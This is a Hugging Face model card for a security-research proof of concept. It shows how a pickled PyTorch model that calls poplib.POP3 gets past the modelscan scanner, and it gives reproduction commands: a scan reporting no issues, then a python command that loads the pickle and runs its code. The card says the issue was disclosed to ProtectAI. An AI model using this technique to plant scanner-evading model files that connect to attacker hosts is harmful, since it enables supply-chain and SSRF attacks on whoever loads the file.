Hugging Face's logo

manja316
/
modelscan-bypass-poplib-ssrf

PyTorch
security-research
modelscan-bypass
Model card Files
xet
 Community

Modelscan Bypass PoC: poplib.POP3 SSRF

Security research only. Do not use for malicious purposes.

Summary

Instantiates POP3 client connecting to attacker host on port 110. poplib is not in modelscan's unsafe_globals blocklist. DNS lookup + TCP connection triggered during pickle.load().

Reproduction 

pip install modelscan
modelscan scan -p pytorch_model.bin
# Result: No issues found

python3 -c "import pickle; pickle.load(open('pytorch_model.bin', 'rb'))"
# Result: Code executes

Affected

  • modelscan 0.7.6 (latest as of 2026-04-11)

Disclosure

Submitted to ProtectAI via Huntr.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support